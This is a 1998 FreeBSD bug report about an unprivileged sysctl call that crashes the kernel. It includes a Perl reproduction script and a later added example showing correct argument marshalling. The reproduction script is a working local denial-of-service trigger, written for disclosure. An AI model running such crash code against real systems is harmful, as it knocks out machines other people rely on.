Date: Mon, 28 Dec 1998 06:07:20 -0800 (PST)
From: gary@hotlava.com
To: freebsd-gnats-submit@FreeBSD.ORG
Subject: kern/9218: sysctl crashes system with bad args
Message-ID: <199812281407.GAA03719@hub.freebsd.org>
>Number:         9218
>Category:       kern
>Synopsis:       sysctl crashes system with bad args
>Confidential:   no
>Severity:       critical
>Priority:       high
>Responsible:    freebsd-bugs
>State:          open
>Quarter:
>Keywords:
>Date-Required:
>Class:          sw-bug
>Submitter-Id:   current-users
>Arrival-Date:   Mon Dec 28 06:10:00 PST 1998
>Last-Modified:
>Originator:     Gary Howland
>Organization:   Hotlava Consulting
>Release:        3.0 RELEASE
>Environment:
3.0 RELEASE
>Description:
The sysctl() call crashes my i386 FreeBSD 3.0-RELEASE machine if given certain parameters.

I am attempting to do a name2oid using an OID of 0,3, and since I am doing it from perl, I am using the syscall() interface with an initial argument of 202 in order to invoke sysctl. I am also *not* uid 0.

My args to sysctl appear to be reasonable, but I can't really be sure what perl is doing with them - could the syscall perhaps be getting in the way? Anyway, my args are 202 for sysctl, [0,3] & 2 for the MIB args, char[56] (all null) and &i (where i == 56) for the next two args, and "kern.hostname" and &j (where j == 13) for the last two args.

It looks like some sort of problem with name2oid in kern_sysctl.c (while typing this I've just realised I should try explicitly null terminating the perl string, to see if that could be the cause of the problem).

I would have tracked this problem down myself, but after a couple of hours pissing about with sysctl code, and not being able to make head nor tail of it, I've given in and am handing it over to those who know more. Obviously I would have sooner posted the fix, rather than the problem, but at least I didn't post the easy-to-run perl exploit :-)

I can provide the perl code that calls sysctl with the arguments I described to those who will be working on the problem - just let me know if you need it. I don't normally withhold exploits (and will post it to bugtraq myself if not there in a couple of weeks), but I do want to give the bug hunters a head start.
I have no idea if this bug can be used to gain privileges, but it would be interesting to find out.
>How-To-Repeat:
#!/usr/bin/perl -w

# syscall number 202 is __sysctl on FreeBSD 3.0/i386
sub sysctl { syscall(202, @_) }

# output buffer for the OID: 56 NUL bytes ("0" x 56 would give ASCII '0's, not NULs)
my $oid     = "\0" x 56;
my $oid_len = pack("L", 56);          # passed as a pointer: size_t *oldlenp
my $mib     = pack("LL", 0, 3);       # Undocumented: {0,3} = name2oid
my $name    = "kern.hostname";
# NB: the sysctl(3) prototype takes newlen as a size_t BY VALUE; a packed
# string here is passed by perl as a pointer, which is what the report describes
my $len     = pack("L", length $name);

sysctl($mib, ((length $mib)/4), $oid, $oid_len, $name, $len)
    && die "Sysctl failed ($!)\n";
>Fix:
Not known - would have done if docs were better!!!
>Audit-Trail:
>Unformatted:
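For comparison, the following is an added example (not the submitter's script and not FreeBSD project code) that performs the same name2oid lookup through the undocumented {0,3} MIB, but marshals every argument as the sysctl(3) prototype expects: the MIB and output buffer as pointers, oldlenp as a pointer to a native-size size_t, and newlen as a plain integer passed by value. It assumes the FreeBSD __sysctl syscall number 202 given in the report, a CTL_MAXNAME of 24 components for the output buffer, and uses a hypothetical helper name name2oid.

```perl
#!/usr/bin/perl -w
# Added example: correct argument marshalling for the name2oid MIB {0,3}.
# Prototype being matched (sysctl(3)):
#   int sysctl(const int *name, u_int namelen, void *oldp,
#              size_t *oldlenp, const void *newp, size_t newlen);
use strict;

use constant SYS___SYSCTL => 202;   # FreeBSD syscall number, as in the report
use constant CTL_MAXNAME  => 24;    # assumed maximum number of OID components

# name2oid: translate a dotted sysctl name into a list of integer OID components.
# Returns an array reference, or undef with $! set on failure.
sub name2oid {
    my ($name) = @_;
    my $mib     = pack("i2", 0, 3);            # {CTL_UNSPEC, 3}: name2oid
    my $oid     = "\0" x (4 * CTL_MAXNAME);    # NUL-filled output buffer (perl passes a pointer)
    my $oid_len = pack("J", length $oid);      # size_t *oldlenp; "J" is pointer-sized, so it matches size_t
    # namelen and newlen are numeric, so perl passes them by value, not as pointers.
    my $rc = syscall(SYS___SYSCTL, $mib, 2, $oid, $oid_len, $name, length $name);
    return undef if $rc == -1;
    my $bytes = unpack("J", $oid_len);         # kernel writes back the number of bytes used
    return [ unpack("i*", substr($oid, 0, $bytes)) ];
}

my $oid = name2oid("kern.hostname");
if ($oid) { print "kern.hostname -> ", join(".", @$oid), "\n"; }
else      { print "name2oid failed: $!\n"; }
```

The size_t arguments use the "J" pack template rather than "L" so the same script works on both 32-bit and 64-bit FreeBSD; the result can be cross-checked against `sysctl -n kern.hostname`, which resolves the same name in userland.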